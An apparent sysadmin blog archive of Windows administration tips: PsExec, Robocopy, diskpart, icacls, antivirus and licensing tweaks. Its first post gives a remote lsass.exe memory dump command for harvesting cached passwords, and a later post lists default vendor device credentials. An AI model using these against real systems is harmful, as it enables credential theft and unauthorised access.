Category Archives: Software

Any software, just for easy download reference!

Obtaining local Passwords from Memory Dump

Outputting memory dump of Windows security sessions. (Obtaining passwords stored locally in cache). This can be run against a remote system to obtain password credential information. This requires “local administrator” rights on the remote PC being targeted.

Requires: PsExec & ProcDump

psexec \\computername -accepteula -s -c procdump -accepteula -ma -o lsass.exe \\server\logs\computername.log

Reference: https://cyberarms.wordpress.com/2015/03/16/grabbing-passwords-from-memory-using-procdump-and-mimikatz/

Trent AV | Tools & Commands

Transferring Trend OfficeScan Client from One Trend Console to Another

\\TrendAV01.domain.com\ofcscan\Admin\Utility\IpXfer\ipxfer.exe -s TrendAV01.domain.com -m 1 -p 8080 -c 49831

Transferring Trend OfficeScan Client from One Trend Console to Another REMOTELY

Download PSEXEC and copy to to C:\Windows\System32

psexec \\LaptopName -u Domain\ADMUSER -p Passw0rd -i "\\TrendAV01.domain.com\Trend_Antivirus\Tools\TrendClientMove_x86.bat"

TrendClientMove_x86.bat

@ECHO OFF
REM Modifies Trend Update Policy Server to use TRENDAV01.domain.com
\\TrendAV01.domain.com\ofcscan\Admin\Utility\IpXfer\ipxfer.exe -s TrendAV01.domain.com -m 1 -p 8080 -c 49831
Echo Update is now Complete!
Echo Click to Close 
Pause

TrendClientMove_x64.bat

@ECHO OFF
REM Modifies Trend Update Policy Server to use TRENDAV01.domain.com
\\TrendAV01.domain.com\ofcscan\Admin\Utility\IpXfer\ipxfer.exe -s TrendAV01.domain.com -m 1 -p 8080 -c 49831
Echo Update is now Complete!
Echo Click to Close 
Pause

Reseting OfficeScan Password:

Reference: Reset Officescan Password

Trend Uninstall Tools:

Disable Java Update | Windows

Quickest solution to stop this annoying update prompt is to use this regedit and which modifies the “Update” DWORD.
This update prompt is even more annoying if the user does not have local administrator rights.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\JavaSoft\Java Update\Policy]

"EnableJavaUpdate"=dword:00000000
"EnableAutoUpdateCheck"=dword:00000000

Veeam Backup | Benchmarks

I’ve been using VMWare converter and Veeam Replication for a while now but still ask myself the question of “How long will this take to migrate or P2V”

Here’s some results to help with the expected performance…

1 VM Move – Server to Server on LAN (1GBPS Switch)

1 VM Restore – Reverse Incremental Backup on iSCSI to Server on LAN (1GBPS Switch)

PSEXEC | Remove File Share Remotely

Sometime it takes time to go and speak to a user, then stop what they are doing so you can make a change or tweak on their PC/Laptop so I like to do this in the background remotely without their knowledge (Hey! I’m an Admin that’s what I do)

PSEXEC has become a good friend for doing this!
I usually dump the “psexec” exe in the c:\Windows\System32 folder so I don’t have to change CMD paths. (Remember you need to run CMD as the user with access to the remote system for this to work)

Remove Share Remotely:

psexec \\PCNAME net share <SHARENAME> /delete

Map Drive Remotely:

psexec \\PCNAME net use S: \\SERVER\SHARE

VMware | “You cannot use the vSphere Client to edit the settings”

After carrying out a re-install of ESXi 5.5 and attaching the VMs the “edit settings” are unavailable.

“You cannot use the vSphere Client to edit the settings of the virtual machines of version 10 or higher.

User the vSphere Web Client to edit the settings of this virtual machine”

As vCentre wasn’t in place for this scenario the workaround was to directly edit the VMs .vmx file.

  1. Load vSphere Client
  2. Select VM: “Remove from Inventory”
  3. Select Storage: “Browse Datastore”
  4. Select VM Folder: Locate/Download “.vmx” file (approximately 3/4 KB)
  5. Edit in Notepad
  6. Modify the “virtualHW.version = “10” to “8”
  7. Upload “.vmx” file back to VM Folder
  8. Select “.vmx” and “Add to Inventory”
  9. VM should now be editable.

 

Formatting Device | “diskpart”

Formatting a USB Flash Drive using the “diskpart” utility:

Diskpart also resolves issues with formatting within Windows GUI:

Error: “Format Cannot Run because the volume is in use by another process” & “Will not format – unknown capacity

CMD

diskpart
list volume
select volume X
clean
create partition primary
format fs=ntfs quick label=DATA
assign letter X

SubACL & iCALCS

SUBINACL (SubInACL.exe)

SubInACL is an alternative command line tool to iCACLS that enables administrators to obtain security information about files, registry keys, and services, and transfer this information from user to user, from local or global group to group, and from domain to domain.

iCACLS

iCACLS example of modifying file permissions:

@echo off
REM ** /T = Performs the operation on all specified files in the current directory and its subdirectories.
REM ** /F = Full Access
REM ** /M = Modify Access
if exist "C:\Program Files (x86)" goto 64
icacls "%ProgramFiles%\Folder" /inheritance:e /grant "MyDomain\Domain Users":M /T
goto next
:64
icacls "%ProgramFiles(x86)%\Folder" /inheritance:e /grant "MyDomain\Domain Users":M /T
next
pause

Show “system uptime” single/multiple servers

“Show uptime of multiple computers” – Looking after multiple servers, I wanted to check which have rebooted and require rebooting due to windows updates. In order to interrogate multiple servers I can use the Sysinternals “PSTools”

Multiple Servers: (Output to txt)

  1. Download PSInfo
  2. Install PSInfo to a chosen location i.e. c:\windows\system32
  3. cmd
psinfo uptime \\* c:\ShowSystemUptimesReport.txt

Uptime = Shows only uptime
\* = checked every pc on the local network

> c:\inventory.txt = Outputs file to this location

Example:

psinfo uptime \\Server-DC1,Server-DC2 > c:\ShowSystemUptimesReport.txt

Single server: (without tools)

systeminfo | find "System Boot Time:"

HP Proliant Microserver | AMD RAIDXpert RAID Rebuild

I recently developed a few faults with Windows Server 2008 R2 install running on my HP Proliant Microserver.
A number of posts and articles suggested the fault maybe the result of a faulty HDD therefore I ran a series of disk checks and applications to verify. Unable to locate any faults I opted to remove both 2TB HDDs (configured in RAID1) in order that I could dock them in another workstation and run thought some more thougher checks.
strangely as a result of removing the HDDs the Windows “BSOD” and crashing did stop, however I was still unable to locate any errors on the HDDs.

Rather than installing both HDDs back in the system, I thought it best to only reinstall one HDD in order to fault find, therefore breaking the RAID. Once happy that the fault was correct (Never found out the issue) I started RAID1 rebuild process using the following steps.

Continue reading

Robocopy (FileServer Migration)

I often use Robocopy when migrating/copying data from file servers.

When running the copy process to transfer data from Windows Server 2003 to Windows Server 2008 I usually run robocopy from the destination server (usually the newer server) in order that it will use version XP027 (5.1.10) There are a number of flaws in XP026 and also requires a seperate download Windows 2003 Resource Kit to obtain it.

This is the main syntax I use to perform a full copy.

robocopy D:\Source E:\Destination /MIR /R:1 /W:1 /COPYALL

Example, when copying from another server (using UNC):

robocopy \\myserver\e$\data E:\data /MIR /R:1 /W:1 /COPYALL

Although “/MIR” is mirroring the data, this will not actually copy the ACL permissions, therefore you will need to ensure that /COPYALL is included. I’ve copied a whole load of data before without including this only to find I have had to recopy to correct the ACL.

/COPYALL : Copy ALL file info (equivalent to /COPY:DATSOU) including timescamps, permissions, ACL, other attributes.
/MIR : MIRror a directory tree – equivalent to /PURGE plus all subfolders (/E)
/R:n : Number of Retries on failed copies – default is 1 million.
/W:n : Wait time between retries – default is 30 seconds.

Sometimes the copy may set the top level folder to “hidden” This can be un-hidden using the “attrib” command:

attrib -h -s E:\data

-s : Removes the system file attribute.
-h : Removes the hidden file attribute.

Continue reading

Yamaha RX-V671 | “PCM” Output

I own a Yamaha RX-V671 Amp which my media PC is connected to via HDMI. One of the issues I get is that when playing audio via the HDMI output, the Yamaha amp display shows “PCM” when I need this to display “Dolby Digital” or “DTS”.

In layman’s terms Pulse Code Modulation (PCM) is a digital scheme for transmitting analog data. Basically this means that the media PC converts the audio into digital and sends this to the amp to output. My objective is for the media PC to output the audio in the original format and let the Amp do the processing (whereby this should display “Dolby Digital” or “DTS” etc.

One of the main methods for playing Videos on the Media PC is by using Kazaa Codec Pack and Media Player included with the install. A quick way to install this is by using www.ninite.com and selecting “Kazaa Codec” pack.

When playing video/audio through Media Player classic, the default installation will output audio via PCM, to correct this, you need to modify the “output” settings on the “FFDShow Audio Decoder Configuration” and enable the “Pass-through” options. The FFDShow icon will display in the taskbar when you play content using it.

Windows & Office Key Activation / Removal

Windows Keys (slmgr):

Change Windows Product Key & Activate:

cmd
slmgr -ipk your-mak-key-here
slmgr -ato

Office Keys (ospp.vbs):

In order to deactivate an Office license you can use the “ospp.vbs” script located in the Office 2010 Installation directory.

This allows for a number of functions, my objective being the deactivation of a activated MAK for Visio & Office 2010.

These are the steps take for this scenario:

CD C:\Program Files\Microsoft Office\Office14

or

CD C:\Program Files (x86)\Microsoft Office\Office14

(32-bit Office 2010 on a 64-bit OS)

Displays a list of Office Product keys installed / Make a note of the Last 5 char of key to be removed:

script ospp.vbs /dstatus

Remove Office Product key activation:

cscript ospp.vbs /unpkey:M9TKQ

HP Proliant Microserver | AMD RAIDXpert Software Download Link

Please can someone tell me WHY is it so HARD to find the DOWNLOAD for “AMD RAIDXpert” ? Makes me so frustrated when you know the software you need (it’s free) but there are so many links and hoops to jump through in order to download it!

As of December 2014 this is a valid link for the “AMD RAIDXpert v3.3.1540.19” direct from AMD (Release Date: 3/28/2012). The AMD RAIDXpert utility gives you complete control of your RAID arrays within a simple web browser based application. This tool allows you to monitor and manage your RAID arrays in the Microsoft Windows environment or via remote login to your system.

Here is the latest direct AMD RAIDXpert Utility URL for the AMD SB7xx/SB8xx Chipset:


RAIDXpert information:

The RAIDXpert Utility isn’t listed on the HP Microserver driver page (http://goo.gl/utZgj) for Windows Server 2008 R2 (even if you do login). When I contacted HP to obtain this software I was told that this software was not supported on the HP Proliant Microserver and that I would need to contact the software vendor (AMD) to get hold of the download. I’ve been given some dodgy advise from HP before so rang back a 2nd time to confirm, again being told that the AMD RAIDXpert utility was not supported on the Microserver or any HP 100 series and that no downloads were available or listed on the HP website but then I stumbled on this link which would completely contradict the information I was provided by HP… 

HP ProLiant Microserver – How to Configure AMD RAIDXpert for E-mail Notificationshttp://goo.gl/gjQKr (artical ID: c03143514) 


Software Notes:
AMD RAIDXpert Utility Info:

  • URL: http://localhost:25902/amd/screen.jsp
  • Default Username: admin
  • Default Password: admin

Locating hardware serial number in Windows:

  1. HP Serial number finder or wmic bios get serialnumber

WBAdmin | Daily Backup and Restore via Schedule

I’ve been working with the windows backup. One downside of this in Windows 2008 is that you can’t schedule a routine backup job to a network device. A work around is use a scheduled task and the WBAdmin tool.

Scheduled Task: (Create a scheduled task and us the following switches)

wbadmin start backup -backuptarget:\\server\backup$\ -vssFull -allCritical -quiet

This command will backup the entire drive including a system image. I don’t think the “allcritical” will work if you then specify items to exclude.

Show Backups Running:

Wbadmin get status

Full list of switches: cc742083

Continue reading

Sophos Autoupdate (Greyed out)

The sophos update settings are greyed out when a domain policy is in place. This is a problem when testing settings and debugging…

Settings can be changed by editing the iconn file:

  • Windows 7: C:\ProgramData\Sophos\AutoUpdate\Config\
  • Windows XP: C:\Program files\Sophos\AutoUpdate\Config\

Open iconn.cfg and change “AllowLocalConfig = 0” to  “AllowLocalConfig = 1”

[PPI.WebConfig_Primary]
AllowLocalConfig = 0
AutoDialTimeout =
LocalPath =
DownloadGranularity =
ConnectionAddress = \\SERVERNAME\SophosUpdate\CIDs\S000\SAVSCFXP\
PortNumber =
UserName = domain\AVUpdate
UserPassword = ********************
ConnectionType = UNC

Just a tip for other Sophos issues, you can check connectivity to Sophos by confirm the following links work:

http://dci.sophosupd.com/
http://d1.sophosupd.com/
http://d2.sophosupd.com/
http://d1.sophosupd.net/
http://d2.sophosupd.net/

Default Passwords

AMD RAIDXpert

  • Username: admin
  • Password: admin
  • http://localhost:25902/amd/screen.jsp

APC UPS:

  • Username: apc
  • Password: apc

Draytek:

  • Username: <blank>
  • Password: admin

HP Proliant DL160 – Windows Storage Server 2003

  • Username: administrator
  • Password: hpinvent

HP Proliant Integrated Lights-Out (iLO)

  • Username: administrator
  • Password:

IBM Management Module Interface (MMI)

  • Username: USERID
  • Password: PASSW0RD
  • Default IP: DHCP then 192.168.70.125 255.255.255.0

IBM Raid Manager

  • Username: administrator
  • Password: <blank>

 

 

 

SCANPST.EXE Tool Location (PST recovery)

Looking for ScanPST tool bundled with Microsoft Office?

Try on the following locations:

SCANPST.EXE

  • disk drive:\Program Files\Microsoft Office\OFFICE12
  • disk drive:\Program Files\Common Files\System\Mapi\1033\
  • disk drive:\Program Files\Common Files\System\Mapi\1033\NT
  • disk drive:\Program Files\Common Files\System\MSMAPI\1033
  • disk drive:\Program Files(x86)\Microsoft Office\Office12
  • disk drive:\Program Files(x86)\Common Files\System\Mapi\1033\
  • disk drive:\Program Files(x86)\Common Files\System\MSMAPI\1033

If not download it from: http://www.edwardsd.co.uk/work/storage/tools/